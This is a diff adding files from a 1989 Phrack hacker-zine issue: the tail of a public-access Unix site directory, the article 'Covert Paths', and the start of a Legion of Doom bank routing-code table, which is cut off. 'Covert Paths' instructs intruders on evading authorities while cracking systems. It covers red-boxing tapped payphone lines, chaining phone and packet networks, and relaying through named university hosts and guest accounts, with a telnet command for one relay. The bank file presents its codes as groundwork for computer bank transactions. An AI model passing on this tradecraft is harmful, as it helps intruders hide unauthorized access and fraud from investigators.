+  conferencing, multi user chats, usenet
+
+02/89  408-997-9119^  netcom      San Jose            CA  3/12/24/96  24
+  Unix System V -- Shell Access [Bourne, Korn, C-Shell], BBS, USENET,
+  Languages: C, Lisp, Prolog, Clips, (Ada soon), $10 / month, login as
+  'guest' no password.  Contact netcom!bobr.
+
+10/89  412-431-8649   eklektik    Pittsburgh          PA  3/12/24     24
+  UNIX PC- SYSV - UNaXcess BBS, new system - donation requested for shell,
+  login: bbs for BBS, uucp-mail, limited Usenet news feeds.  Gaming SIGS.
+  Contact:  ...!gatech!emoryu1!eklektik!anthony
+
+11/89  415-332-6106^  well        Sausalito           CA  12/24       24
+  6-processor Sequent Balance (32032); UUCP and USENET access; multiple
+  lines; access via CPN; PICOSPAN BBS; $3/hour.  Contact (415) 332-4335
+
+06/88  415-582-7691   cpro        Hayward             CA  12/24       24
+  Microport SYSV 2, UNaXcess bbs, no fee, 60 min limit, shell access
+
+07/89  415-753-5265^  wet         San Francisco       CA  3/12/24     24
+  386 SYS V.3.  Wetware Diversions.  $15 registration, $0.01/minute.
+  Public Access UNIX System:  uucp, PicoSpan bbs, full Usenet News,
+  multiple lines, shell access.  Newusers get initial credit!
+  contact:{ucsfcca|claris|hoptoad}!wet!cc (Christopher Cilley)
+
+05/89  415-783-2543   esfenn      Hayward             CA  3/12/24     24
+  System ????; USENET news; E-mail; No charges; Contact esfenn!william.
+
+01/89  416-452-0926   telly       Brampton            ON  12/24/96    24
+  286 Xenix; proprietary menu-based BBS includes Usenet site searching.
+  News (all groups, incl biz, pubnet, gnu), mail (including to/from Internet),
+  some archives.  Feeds available. Fee: $75(Cdn)/year.
+  Contact: Evan Leibovitch, evan@telly.on.ca, {uunet!attcan,utzoo}!telly!evan
+
+12/88  416-461-2608   tmsoft      Toronto             ON  3/12/24/96  24
+  NS32016, Sys5r2, shell; news+mail $30/mo, general-timesharing $60/mo
+  All newsgroups.  Willing to setup mail/news connections.
+  Archives:comp.sources.{unix,games,x,misc}
+  Contact: Dave Mason <mason@tmsoft> / Login: newuser
+
+07/89  416-654-8854   ziebmef     Toronto             ON  3/12/24/96  24
+  AT&T 3B1, Sys V, shell, news, mail, no fee (donations accepted)
+  Carries most newsgroups (willing to add extra ones on request)
+  Telebit access, willing to give mail feeds
+  Contact: Chris Siebenmann, {utzoo!telly,ncrcan}!ziebmef!cks
+
+08/89  502-968-5401   disk        Louisville          KY  3/12        24
+  386 clone, Microport System V, 600 meg.  6 lines 5401 thru 5406.
+  rarrying most USENET groups, Shell access, games, downloads,
+  multi-user chat, and more.  Rate info available via a free trial
+  account.
+
+12/88  503-254-0458   bucket      Portland            OR  3/12/24     24
+  Tektronix 6130, UTek 2.3(4.2BSD-derived).  Bit Bucket BBS publically
+  available; login as 'bbs'.  BBS is message only.  Users intereseted in
+  access to Unix should contact SYSOP via the BBS or send EMail to
+  ..tektronix!tessi!bucket!rickb.  Unix services include USENET News,
+  EMail, and all tools/games/utility access. Alternate dial-in lines
+  available for Unix users.
+
+05/89  503-640-4262^  agora       PDX                 OR  3/12/24     24
+  Intel Xenix-286, $2/mo or $20/yr, news, mail, games, programming
+  two lines with trunk-hunt, 4380 supports MNP level 3.
+  Contact: Alan Batie, tektronix!tessi!agora!batie
+
+10/89  512-346-2339   bigtex      Austin              TX  96          24
+  Equip unknown, no shell, no fee, anonymous uucp ONLY, Telebit 9600/PEP
+  mail & newsfeeds (limited) available.  Carries GNU software.
+  anon login: nuucp NO PASSWD, file list /usr3/index
+  Contact: ...!uunet!utastro!bigtex!james
+
+07/89  512-832-8835   rpp386      Austin              TX  12/24       24
+  386 SYSV, no shell, no bbs, anonymous uucp file transfer site only, no fee
+  uucp and kermit server available, login uucp or kermit NO PASSWD
+
+10/89  513-779-8209   cinnet      Cincinnati          OH  12/24/96    24
+  80386, ISC 386/ix 2.02, Telebit access, 1 line; $7.50/Month; shell
+  access, Usenet access; news feeds available;
+  login: newact password: new user to register for shell access
+
+05/89  516-872-2137   lilink      Long Island         NY  12/24       24
+  80386/20 Mhz. , three lines, News/Mail/Shell access. Online games,
+  conferencing, full program development system, full text processing.
+  We carry ALL Usenet groups.  Dues are  $10/month (unlimited access).
+  Accounts are filled by application/phone verification. Login: new
+  Alternate numbers: 516-872-2138 & 516-872-2349
+
+07/89  517-487-3356   lunapark    E. Lansing          MI  12/24    24
+  Compaq 386/20 SCO-XENIX 2.3.1, lunabbs bulletin board & conferencing
+  system, no fee, login: bbs  no password.  Primarily UNIX software
+  with focus on TeX and Postscript, also some ATARI-ST and IBM-PC stuff
+  2400/1200 --> 8 N 1
+  Contact: ...!uunet!frith!lunapark!larry
+
+12/88  518-346-8033   sixhub      upstate             NY  3/12/24     24
+  PC Designs GV386.  hub machine of the upstate NY UNIX users group (*IX)
+  two line reserved for incoming, bbs no fee, news & email fee $15/year
+  Smorgasboard of BBS systems, UNaXcess and XBBS online,
+  Citadel BBS now in production. Contact: davidsen@sixhub.uucp.
+
+09/88  602-941-2005   xroads      Phoenix             AZ  12/24       24
+  Motorola VME1121, UNIX 5.2, Crossroads BBS, Fee $30/yr + $.50/.25 (call)
+  prime (evenings)/non-prime, USENET news, multi-chat, online games,
+  movie reviews, adventure games, dos unix/xenix files for dload, multi lines
+
+08/89  603-880-8120   ubbs-nh     Nashua              NH  3/12/24/96  24
+  New England Unix Archive Site.  Multiple lines.  Services include E-Mail,
+  full or partial news feeds.  XBBS access $25/year, User Accounts or News
+  Feeds available $60/year (1 hour/day) or $120/year (2 hours/day).
+  Contact:  noel@ubbs-nh or {decvax}!ubbs-nh!noel or leave message on the
+  bbs.  Voice:  603 595-2947
+
+08/89  605-348-2738   loft386     Rapid City          SD  3/12/24/96  24
+  80386 SYS V/386 Rel 3.2, Usenet mail/news via UUNET, UUNET archive access.
+  NO BBS!  News feeds avaliable.  400 meg hd.  Fees: $10/month or $25/quarter.
+  Call (605) 343-8760 and talk to Doug Ingraham to arrange an account or email
+  uunet!loft386!dpi
+
+08/88  608-273-2657   madnix      Madison             WI  3/12/24     24
+  286 SCO-XENIX, shell, no fee, USENET news, mail, login: newuser
+  Contact: ray@madnix
+
+08/89  612-473-2295   pnet51      Minneapolis         MN  3/12/24     24
+  Equip ?, Xenix, multi-line, no fee, some Usenet news, email, multi-threaded
+  conferencing, login: pnet id: new, PC Pursuitable
+  UUCP: {rosevax, crash}!orbit!pnet51!admin
+
+08/89  615-896-8716   raider      Murfreesboro        TN  12/24       24
+  Tandy 4000 XENIX, XBBS, shell accounts, news and mail, newsfeeds
+  available. Two line system; second dialup is 615-896-7905.
+  Contact: root@raider.MFEE.TN.US (Bob Reineri); NO CHARGE.
+
+07/89  616-457-1964   wybbs       Jenison             MI  3/12/24     24
+  286 - SCO-XENIX 2.2.1, no fees, two lines, shell access, usenet news,
+  150 meg storage, XBBS, interests: ham radio, xenix
+  AKA: Consultants Connection  Contact: danielw@wybbs.UUCP
+  Alternate phone #: 616-457-9909 (max 1200 baud)
+
+11/89  617-739-9753   world       Brookline           MA  3/12/24/96  24
+  Sun 4/280, SunOS 4.03;  Shell, USENET, E-Mail, UUCP and home of the
+  Open Book Initiative (text project);  fees: 8a-6p $8/hr, 6p-12a $5/hr,
+  12a-8a $2.50/hr;  Multiple lines: 2400 MNP used on listed number,
+  Telebits used on others;  login as "new";  Contact: geb@world.std.com
+
+07/88  619-444-7006^  pnet01      El Cajon            CA  3/12/24     24
+  BSD Unix, 3 lines, login: pnet id: new, some USENET, email, conferencing
+  Home of P-Net software, mail to crash!bblue or pnet01!bblue for info.
+  Contributions requested
+  Unix accounts available for regulars, PC Pursuit access 2/88.
+
+10/88  703-281-7997^  grebyn      Vienna              VA  3/12/24/96  24
+  Vax/Ultrix.  $25/month.  GNU EMACS, USENET, PC/BLUE archives, Telebit on 7998
+  and 7999, archives, Ada repository, comp.sources.(misc,unix,games) archives,
+  net.sources archives, 3 C compilers, Ada compiler,  500MB disk, multiple
+  lines
+
+11/89  708-272-5912^  igloo       Northbrook          IL  12/24/96    24
+  3B2-300;  accounts by invitation only, no limit/no fee;  full usenet;
+  132megs HD;  2 lines rotary, 9600 telebit on 272-5917
+  Contact: igloo!postmaster
+
+11/89  708-301-2100^  jolnet      Joliet              IL  3/12/24     24
+  3b2/400 - Unix, public access and contributions, No fee for postnews.
+  5 lines  AKCS bbs.  Free Newsfeeds available.  >450 MB online storage.
+  Free Shell and Usenet access.  Telebit Trailblazer access (2104).
+  Telenet access.
+
+11/89  708-566-8911^  ddsw1       Mundelein           IL  3/12/24/96  24
+  Televideo 386 -SCO XENIX 386, guest usr 1 hr daily, fee extends use
+  AKCS bbs, fee $30/6 months $50/year, Authors of AKCS bbs
+  multiple lines, 9600 bps available, anonymous uucp, >/README for info
+  Contact: Karl Denninger (...!ddsw1!karl) Voice: (312) 566-8910
+
+11/89  708-833-8126^  vpnet       Villa Park          IL  12/24/96    24
+  386 Clone - Interactive 386/ix R2.0 (3.2), no fee. Akcs linked bbs
+  including several Usenet conf's. No charge for shells. Trailblazer.
+  Mail lisbon@vpnet.UUCP
+
+07/89  713-438-5018   sugar       Houston             TX  3/12/24/96  24
+  386/AT (2) networked - Bell Technologies V/386, usenet, news, downloads
+  Homegrown BBS software, Trailblazer+ access, currently no charges
+
+10/89  713-668-7176^  nuchat      Houston             TX  3/12/24/96  24
+  i386;  USENET, Mail, Shell Access;  300M On-line;  Trailbazer Used;
+  No fee.
+
+12/88  714-635-2863   dhw68k      Anaheim             CA  12/24       24
+  Unistride 2.1, no fee, also 714-385-1915, Trailblazer on both lines,
+  USENET News, /bin/sh or /bin/csh available
+
+05/89  714-662-7450   turnkey     Inglewood           CA  12/24       24
+  286 - Xenix SYSV, XBBS
+
+11/89  714-821-9671   alphacm     Cypress             CA  12/24/96    24
+  386 - SCO-XENIX, no fee, Home of XBBS, 90 minute per login, 4 lines,
+  9600 baud via MicroComm/Hayes (v.29)
+    uucp-anon:  ogin: nuucp  NO PASSWD
+
+05/89  714-842-5851   conexch     Santa Ana           CA  3/12/24     24
+  386 - SCO Xenix - Free Unix guest login and PC-DOS bbs login, one
+  hour inital time limit, USENET news, shell access granted on request &
+  $25/quarter donation.  Anon uucp: ogin: nuucp  NO PASSWD.  List of
+  available Unix files resides in /usr3/public/FILES.
+
+08/88  714-894-2246   stanton     Irvine              CA  3/12/24     24
+  286 - SCO Xenix - donation requested, limit 240 min, XBBS, USENET news
+  UNIX access granted on request through BBS, 20$/year, access includes
+  C development system (XENIX/MSDOS), PROCALC 1-2-3 clone, FOXBASE+
+  anon uucp: ogin: nuucp, no word, 2400/1200/300 MNP supported
+
+05/88  719-632-4111   chariot     Colo Sprgs          CO  3/12        24
+  Convrgnt Minifrme - SYS V, multiple lines, fee $12/mo Picospan
+
+08/89  801-943-7947^  i-core      Salt Lake City      UT  3/12/24/96  24
+  286 SYS V, Unidel BBS, a.k.a. Bitsko's Bar & Grill, no limit, no fee,
+  UseNet and Citadel feeds available, home of Unidel BBS, Telebit 19200 used
+  Contact: ken@i-core.UUCP or uunet!iconsys!caeco!i-core!ken
+
+12/88  802-865-3614   tnl         Burlington          VT  3/12/24     24
+  80386 w/ SCO XENIX. No Fee.  2 hr session limit.  XBBS/USENET, shell.
+  Login as 'new' for a shell account, no validation.  AKA: Northern Lights.
+
+08/88  813-952-1981   usource     Sarasota            FL  12/24      -24
+  386 - SCO-XENIX, fee depends on services provided, no fee for bbs. New users
+  subscribe by logging in as 'help' or 'newuser' (no password).  Primary
+  purpose is technical forum. 6pm-8am M-Th, 24 hrs weeekends (6pm Fri-8am Mon)
+  uucp-anon: 1200/2400 bps --> ogin: auucp  word: gateway
+  uucp-anon directory: /usr/spool/uucppublic; contact: frank@usource.UUCP
+
+08/88  814-333-6728   sir-alan    Meadville           PA  3/12/24     24
+  Tandy XENIX/68000 03.01.02, Allegheny College, UNaXcess BBS
+  uucp-anon: ogin: pdsrc  NO PASSWD
+  uucp-anon directory: /usr/spool/pdsrc/all.subjects
+  Telebit TB+ available at 814 337 0894, now operating.
+  Contact: sir-alan!mikes
+
+05/88  814-337-3159   oncoast     Meadville           PA  3/12/24/96  24
+  Tandy 12/6000, no fee, no bbs, archive site, USR HST 9600, cycle 24/96/12
+  vols 1 - 13 of mod.sources/comp.sources.unix, comp.sources.misc
+  New stuff on sir-alan, older on oncoast. 2 uucp logins "uucp" and "pdsrc"
+  files list =  /usr/spool/uucppublic/my.directory or /usr/spool/pdsrc/
+  all.subjects.Z
+
+09/89  916-649-0161   sactoh0     Sacramento          CA  12/24/96    24
+  3B2/310 SYSV.2, SAC_UNIX;  $2/month, limit 90 min, 2 lines, TB on line,
+  2400/1200 baud on 916-722-6519;  USENET, E-Mail, Games;  login: new
+  Contact: ..pacbell!sactoh0!sysop
+
+089  919-493-7111^  wolves      Durham              NC  3/12/24       24
+  AMS 386/25 - UNIX SysVr3.2, XBBS, no fee for bbs.  Rates for UNIX access
+  and USENET are being determined.  Developing yet another UNIX bbs (ideas
+  welcome!)  Single line, telebit coming soon.
+  Contact: wolves!ggw or wolves!sysop  [...duke!dukcds!wolves!...]
+
+-------------------------------------------------------------------------------
+NOTE:  ^ means the site is reachable using PC Pursuit.
+===============================================================================
+This list is maintained by Phil Eschallier on lgnp1.  Any additions, deletions,
+or corrections should be sent to one of the addresses below.  The nixpub
+listings are kept as current as possible.  However, you use this data at your
+own risk and cost -- all standard disclaimers apply!!!
+------
+                Lists available from lgnp1 via anonomous uucp.
+                       +1 215 348 9727 [Telebit access]
+                     login:  nuucp  NO PWD   [no rmail permitted]
+                 this list:  /usr/spool/uucppublic/nixpub
+                short list:  /usr/spool/uucppublic/nixpub.short
+           or from news groups pubnet.nixpub, comp.misc or alt.bbs.
+------
+E-MAIL ...
+  uucp:  ..!uunet!lgnp1!$ phil | nixpub $
+    or:  $ phil | nixpub $@LS.COM
+   CIS:  71076,1576
+===============================================================================
+    COMPAQ, IBM, PC Pursuit, [SCO] XENIX, UNIX, etc. are trademarks of the
+    respective companies.
+===============================================================================
+
+                             nixpub short listing
+      Open Access UNIX (*NIX) Sites [Fee / No Fee] for mapped sites only
+                             [ November 12, 1989 ]
+
+
+Systems listed (73)
+Legend:  fee/contribution ($), no fee (-$), hours (24), not (-24)
+         shell (S), USENET news (N), email (M), multiple lines (T)
+         Telebit 9600 bps on main number (+P), Telebit on other line[s] (P)
+         Courier 9600 bps on main number (+H), Courier on other line[s] (H)
+         anonymous uucp (A), archive site ONLY - see long form list (@)
+         @> = anonymous uucp archive site listed in ANONIX (mike@cpmain)
+         Dialable thru PC Pursuit (^)
+
+Last
+Contact
+Date   Telephone #    Sys-name  Location          Baud        Legend
+-----  ------------   --------  -----------       -------     ---------
+08/89  201-846-2460^  althea    New Brunswic  NJ  3/12/24     24 -$ M N S
+10/89  206-328-4944   polari    Seatle        WA  3/12        24 $ M N P S T
+10/89  212-420-0527   magpie    NYC           NY  3/12/24/96  24 -$ T P
+10/89  212-675-7059   marob     NYC           NY  12/24       24 -$ A
+05/89  212-879-9031^  dasys1    NYC           NY  12/24       24 $ S N M T
+09/89  213-376-5714^  pnet02    Redondo Bch   CA  3/12/24     24 -$ M N T
+09/89  213-397-3137^  stb       Santa Monica  CA  3/12/24     24 -$ S A
+11/88  213-459-5891   amazing   Pac Palisade  CA  3/12/24     24 $ T
+07/88  214-247-2367   ozdaltx   Dallas        TX  3/12/24     24 $ N T
+07/89  214-741-2130   attctc    Dallas        TX  3/12/24     24 -$ N M S T A
+11/89  215-348-9727   lgnp1     Doylestown    PA  3/12/24/96  24 $ A M N +P S
+09/89  216-582-2441   ncoast    Cleveland     OH  12/24/96    24 $ S N M P T
+08/88  217-529-3223   pallas    Springfield   IL  3/12/24     24 $ T
+10/89  219-289-0286   nstar     South Bend    IN  3/12/24/96  24 -$ H M N P S T
+08/88  312-283-0559^  chinet    Chicago       IL  3/12/24     24 $ N T
+10/89  312-338-0632^  point     Chicago       IL  3/12/24/96  24 -$ N P S T
+04/89  313-623-6309   nucleus   Clarkston     MI  12/24       24 $ S N M
+11/88  313-994-6333   m-net     Ann Arbor     MI  3/12        24 $ T
+08/89  313-996-4644^  anet      Ann Arbor     MI  3/12        24 $ T
+08/89  314-474-4581   gensis    Columbia      MO  3/12/24/96  24 -$ M S
+10/89  404-321-5020^  jdyx      Atlanta       GA  12/24       24 $ M N +P S T
+05/88  407-380-6228   rtmvax    Orlando       FL  3/12/24     24 -$ N M
+09/89  408-245-7726^  uuwest    Sunnyvale     CA  3/12/24     24 -$ N
+04/88  408-247-4810   sharks    Santa Clara   CA  3/12        24 $ S N M T
+11/89  408-423-9995   cruzio    Santa Cruz    CA  12/24       24 $ M T
+10/89  408-725-0561^  portal    Cupertino     CA  3/12/24     24 $ -S N M T
+02/89  408-997-9119^  netcom    San Jose      CA  3/12/24/96  24 $ M N S
+10/89  412-431-8649   eklektik  Pittsburgh    PA  3/12/24     24 $ S N M
+11/89  415-332-6106^  well      Sausalito     CA  12/24       24 $ M N S T
+06/88  415-582-7691   cpro      Hayward       CA  12/24       24 -$ S
+07/89  415-753-5265^  wet       San Francisc  CA  3/12/24     24 $ M N S T
+05/89  415-783-2543   esfenn    Hayward       CA  3/12/24     24 -$ M N S
+01/89  416-452-0926   telly     Brampton      ON  12/24/96    +P 24 $ M N
+12/88  416-461-2608   tmsoft    Toronto       ON  3/12/24/96  24 $ S M N
+07/89  416-654-8854   ziebmef   Toronto       ON  3/12/24/96  24 +P M N S T
+08/89  502-968-5401   disk      Louisville    KY  3/12        24 $ M N S T
+12/88  503-254-0458   bucket    Portland      OR  3/12/24     24 -$ N M T
+05/89  503-640-4262^  agora     PDX           OR  3/12/24     24 $ M N S T
+10/88  512-346-2339   bigtex    Austin        TX  96          +P 24 -S -$ A @>
+07/89  512-832-8835   rpp386    Austin        TX  12/24       24 @ -$ -S A T
+10/89  513-779-8209   cinnet    Cincinnati    OH  12/24/96    24 $ M N +P S
+05/89  516-872-2137   lilink    Long Island   NY  12/24       24 $ M N S T
+07/89  517-487-3356   lunapark  E. Lansing    MI  12/24       24 -$
+12/88  518-346-8033   sixhub    upstate       NY  3/12/24     24 $ S N M T
+09/88  602-941-2005   xroads    Phoenix       AZ  3/12/24     24 $ N T
+08/89  603-880-8120   ubbs-nh   Nashua        NH  3/12/24/96  24 -$ M N +P S T
+08/89  605-348-2738   loft386   Rapid City    SD  3/12/24/96  24 $ M N +P S
+08/88  608-273-2657   madnix    Madison       WI  3/12/24     24 -$ S N M
+08/89  612-473-2295   pnet51    Minneapolis   MN  3/12/24     24 -$ N M T
+08/89  615-896-8716   raider    Murfreesboro  TN  12/24       24 -$ S N M T
+07/89  616-457-1964   wybbs     Jenison       MI  3/12/24     24 -$ S N T
+11/89  617-739-9753   world     Brookline     MA  3/12/24/96  24 $ M N P S T
+07/88  619-444-7006^  pnet01    El Cajon      CA  3/12/24     24 $ N M S T
+10/88  703-281-7997^  grebyn    Vienna        VA  3/12/24/96  24 $ N M T P
+11/89  708-272-5912^  igloo     Northbrook    IL  12/24/96    24 -$ S N T P
+11/89  708-301-2100^  jolnet    Joliet        IL  3/12/24     24 -$ +P M N S T
+08/88  312-566-8911^  ddsw1     Mundelein     IL  3/12/24/96  24 $ S N M T A P
+11/89  708-833-8126^  vpnet     Villa Park    IL  12/24/96    24 -$ +P M N S
+07/89  713-438-5018   sugar     Houston       TX  3/12/24/96  24 -$ N +P
+10/89  713-668-7176^  nuchat    Houston       TX  3/12/24/96  24 -$ M N +P S
+12/88  714-635-2863   dhw68k    Anaheim       CA  12/24       24 -$ T
+05/89  714-662-7450   turnkey   Inglewood     CA  12/24       24 -$
+11/89  714-821-9671   alphacm   Cypress       CA  12/24/96    24 -$ T H A
+05/89  714-842-5851   conexch   Santa Ana     CA  3/12/24     24 $ A M N S
+08/88  714-894-2246   stanton   Irvine        CA  3/12/24     24 $ S N
+05/88  719-632-4111   chariot   Colo Sprgs    CO  3/12        24 $ T
+08/89  801-943-7947^  i-core    Salt Lake Ci  UT  3/12/24/96  +P 24 -$ A N
+06/88  802-865-3614   tnl       Burlington    VT  3/12/24     24 -$ S N M
+08/88  813-952-1981   usource   Sarasota      FL  12/24       -24 -$ A
+08/88  814-333-6728   sir-alan  Meadville     PA  3/12/24     24 -$ A P
+05/88  814-337-3159   oncoast   Meadville     PA  3/12/24/96  +H 24 @ -$ -S A
+09/89  916-649-0161   sactoh0   Sacramento    CA  12/24/96    24 $ M N +P S T
+08/89  919-493-7111^  wolves    Durham        NC  3/12/24     24 $ M N S
+-------------------------------------------------------------------------------
+NOTE:  ^ means the site is reachable using PC Pursuit.
+===============================================================================
+This list is maintained by Phil Eschallier on lgnp1.  Any additions, deletions,
+or corrections should be sent to one of the addresses below.  The nixpub
+listings are kept as current as possible.  However, you use this data at your
+own risk and cost -- all standard disclaimers apply!!!
+------
+                Lists available from lgnp1 via anonomous uucp.
+                       +1 215 348 9727 [Telebit access]
+                     login:  nuucp  NO PWD   [no rmail permitted]
+                 this list:  /usr/spool/uucppublic/nixpub.short
+                 long list:  /usr/spool/uucppublic/nixpub
+            or from news groups pubnet.nixpub, comp.misc or alt.bbs
+------
+E-MAIL ...
+  uucp:  ..!uunet!lgnp1!{ phil | nixpub }
+    or:  { phil | nixpub }@LS.COM
+===============================================================================
+  COMPAQ, IBM, PC Pursuit, [SCO] XENIX, UNIX, etc. are trademarks of the
+  respective companies.
+
+                        >--------=====END=====--------<
diff --git a/phrack29/5.txt b/phrack29/5.txt
new file mode 100644
index 0000000..ca3bb35
--- /dev/null
+++ b/phrack29/5.txt
@@ -0,0 +1,92 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 29, File #5 of 12
+
+               [-][-] [-][-] [-][-] [-][-] [-][-] [-][-] [-][-]
+               [-]                                          [-]
+               [-]               Covert Paths               [-]
+               [-]                                          [-]
+               [-]                    by                    [-]
+               [-]                                          [-]
+               [-]    Cyber Neuron Limited and Synthecide   [-]
+               [-]                                          [-]
+               [-]             November 1, 1989             [-]
+               [-]                                          [-]
+               [-][-] [-][-] [-][-] [-][-] [-][-] [-][-] [-][-]
+
+
+When cracking a system, it is important for you to use a path to the system
+that will not lead the authorities to your door step.
+
+There are several methods for doing this and all of them will depend on your
+destination, available time, goal and the phase of the moon.  This article
+deals mostly with cover attacks via a connected network.
+
+If attacking via a phone link:
+
+  o  Tap in to your local payphone line and red box or "sprint" the call.
+
+  o  Using a long haul service (like Sprint or MCI) to dial into systems in
+         remote cities.  [This should hinder a track by a good order of
+         magnitude.]
+
+  o  Use a midnight packet switching network (eg: PC-Pursuit, Tymnet, et. al.)
+
+  o  All the above.
+
+
+If attacking from a network (eg: the Internet) there are ways of spoofing the
+packet headers, but this requires superuser privileges on the system you are
+attacking from and a fair amount of 'C' programming expertise.  Therefore, this
+will not be discussed here in any more detail.
+
+Another obvious trick is to use network routers and gateways along with guest
+accounts to "route" your data path.  This will cause the person tracking you to
+have to go though more red tape and hassle to track you.  This gives you more
+time to cover your tracks.
+
+Some useful paths I know of are:
+
+accuvax.nwu.edu
+cory.berkeley.edu
+violet.berkeley.edu
+headcrash.berkeley.edu
+
+
+    host: violet.berkeley.edu           host: headcrash.berkeley.edu
+    account: nobody                     account: netgate
+    net address:128.32.136.22           net address: 128.32.234.31
+
+
+    host: cory.berkeley.edu             host accuvax.nwu.edu
+    account: terminal                   account: telnet
+    net address: 128.32.134.6           net address: 129.105.49.1
+
+
+    host: lightning.berkeley.edu        host: score.stanford.edu
+    port: 8033                          account: guest
+    net address: 128.32.234.10          net address: 36.8.0.46
+
+
+The accounts nobody, netgate, and terminal at Berkeley are accounts that were
+installed so that people can use the system to rlogin or telnet to an account
+elsewhere without a local login (or so I am told by the local hackers [Hi
+Audrey...]).  The lightning path/method can be accessed by the command:
+"telnet lightning.berkeley.edu 8033".
+
+I am interested in hearing about other Internet access accounts that are
+available out there.  If you know of any please send them in.
+
+Tymnet is also a useful method of gaining access to systems.  From Tymnet, you
+can hook up to just about any computer and use the other methods to go one step
+further.  It's not until you are traced back to the computer you linked to from
+Tymnet that they can even begin to follow you back.  My understanding is that
+for a systen to find your Tymnet node, they must contact Tymnet personally and
+ask them to put a trap on their connection.
+
+For more infomation concerning Tymnet see the article "Hacking & Tymnet" by
+Synthecide in Phrack Inc. Newsletter Issue XXX.
+
+           **********************************
+
+                        >--------=====END=====--------<
diff --git a/phrack29/6.txt b/phrack29/6.txt
new file mode 100644
index 0000000..39c34cf
--- /dev/null
+++ b/phrack29/6.txt
@@ -0,0 +1,333 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 29, File #6 of 12
+
+                             + BANK INFORMATION +
+                              \                /
+                               \              /
+                               ___Compiled By___
+                              /                 \
+                                Legion Of Doom!
+                                 EFT Division
+                                 ------------
+
+In order to exact any type of bank associated transaction by computer, one must
+have a working knowledge of the various routing codes involved in the banking
+processes.  The following is an informational guide to the coding used in
+American banking transactions.
+
+ABA (American Bankers Association) Transit Numbers
+
+Numbers 1 to 49 inclusive are Prefixes for Cities
+Numbers 50 to 99 inclusive are Prefixes for States
+
+Prefix Numbers 50 to 58 are Eastern States
+Prefix Number 59 is for Alaska, Hawaii, and US Territories
+Prefix Numbers 60 to 69 are Southeastern States
+Prefix Numbers 70 to 79 are Central States
+Prefix Numbers 80 to 88 are Southwestern States
+Prefix Numbers 90 to 99 are Western States
+
+1    New York, NY
+2    Chicago, IL
+3    Philadelphia, PA
+4    St. Louis, MO
+5    Boston, MA
+6    Cleveland, OH
+7    Baltimore, MD
+8    Pittsburgh, PA
+9    Detroit, MI
+10   Buffalo, NY
+11   San Francisco, CA
+12   Milwaukee, WI
+13   Cincinnati, OH
+14   New Orleans, LA
+15   Washington D.C.
+16   Los Angeles, CA
+18   Kansas City, MO
+19   Seattle, WA
+20   Indianapolis, IN
+21   Louisville, KY
+22   St. Paul, MN
+23   Denver, CO
+24   Portland, OR
+25   Columbus, OH
+26   Memphis, TN
+27   Omaha, NE
+28   Spokane, WA
+29   Albany, NY
+30   San Antonio, TX
+31   Salt Lake City, UT
+32   Dallas, TX
+33   Des Moines, IA
+34   Tacoma, WA
+35   Houston, TX
+36   St. Joseph, MO
+37   Fort Worth, TX
+38   Savannah, GA
+39   Oklahoma City, OK
+40   Wichita, KS
+41   Sioux City, IA
+42   Pueblo, CO
+43   Lincoln, NE
+44   Topeka, KS
+45   Dubuque, IA
+46   Galveston, TX
+47   Cedar Rapids, IA
+48   Waco, TX
+49   Muskogee, OK
+50   New York
+51   Connecticut
+52   Maine
+53   Massachusetts
+54   New Hampshire
+55   New Jersey
+56   Ohio
+57   Rhode Island
+58   Vermont
+59   Alaska, American Samoa, Guam, Hawaii, Puerto Rico, Virgin Islands
+60   Pennsylvania
+61   Alabama
+62   Delaware
+63   Florida
+64   Georgia
+65   Maryland
+66   North Carolina
+67   South Carolina
+68   Virginia
+69   West Virginia
+70   Illinois
+71   Indiana
+72   Iowa
+73   Kentucky
+74   Michigan
+75   Minnesota
+76   Nebraska
+77   North Dakota
+78   South Dakota
+79   Wisconsin
+80   Missouri
+81   Arkansas
+83   Kansas
+84   Louisiana
+85   Mississippi
+86   Oklahoma
+87   Tennessee
+88   Texas
+90   California
+91   Arizona
+92   Idaho
+93   Montana
+94   Nevada
+95   New Mexico
+96   Oregon
+97   Utah
+98   Washington
+99   Wyoming
+
+
+Federal Reserve Routing Symbols
+
+     * All banks in an area served by a FR bank or branch bank
+       carry the routing symbol of the FR bank or branch
+
+1    Federal Reserve Bank of Boston Head          5-1
+     Office                                       110
+
+2    Federal Reserve Bank of New York Head        1-120
+     Office                                        210
+
+     Buffalo Branch                               10-26
+                                                   220
+
+3    Federal Reserve Bank of Philadelphia         3-4
+     Head Office                                  310
+
+4    Federal Reserve Bank of Cleveland Head       0-1
+     Office                                       410
+
+     Cincinnati Branch                            13-43
+                                                   420
+
+     Pittsburgh Branch                            8-30
+                                                  430
+
+5    Federal Reserve Bank of Richmond Head        68-3
+     Office                                       510
+
+     Baltimore Branch                             7-27
+                                                  520
+
+     Charlotte Branch                             66-20
+                                                   530
+
+6    Federal Reserve Bank of Atlanta Head         64-14
+     Office                                        610
+
+     Birmingham Branch                            61-19
+                                                   620
+
+     Jacksonville Branch                          63-19
+                                                   630
+
+     Nashville Branch                             87-10
+                                                   640
+
+     New Orleans Branch                           14-21
+                                                   650
+
+7    Federal Reserve Bank of Chicago Head         2-30
+     Office                                       710
+
+     Detroit Branch                               9-29
+                                                  720
+
+8    Federal Reserve Bank of St. Louis Head       4-4
+     Office                                       810
+
+     Little Rock Branch                           81-13
+                                                   110
+
+     Louisville Branch                            21-59
+                                                   830
+
+     Memphis Branch                               26-3
+                                                  840
+
+9    Federal Reserve Bank of Minneapolis          17-8
+     Head Office                                  910
+
+     Helena Branch                                92-26
+                                                   920
+
+10   Federal Reserve Bank of Kansas City          18-4
+     Head Office                                  1010
+
+     Denver Branch                                23-19
+                                                  1020
+
+     Oklahoma City Branch                         39-24
+                                                  1030
+
+     Omaha Branch                                 27-12
+                                                  1040
+
+11   Federal Reserve Bank of Dallas Head          32-3
+     Office                                       1110
+
+     El Paso Branch                               88-1
+                                                  1120
+
+     Houston Branch                               35-4
+                                                  1130
+
+     San Antonio Branch                           30-72
+                                                  1140
+
+12   Federal Reserve Bank of San Francisco        11-37
+     Head Office                                  1210
+
+     Los Angeles Branch                           16-16
+                                                  1220
+
+     Portland Branch                              24-1
+                                                  1230
+
+     Salt Lake City Branch                        31-31
+                                                  1240
+
+     Seattle Branch                               19-1
+                                                  1250
+
+
+BANK IDENTIFICATION CODES
+
+
+XX-YYY   WHERE:      XX = City or State
+ ZZZZ               YYY = Bank of Origin
+
+                   ZZZZ = Federal Reserve Routing Code
+
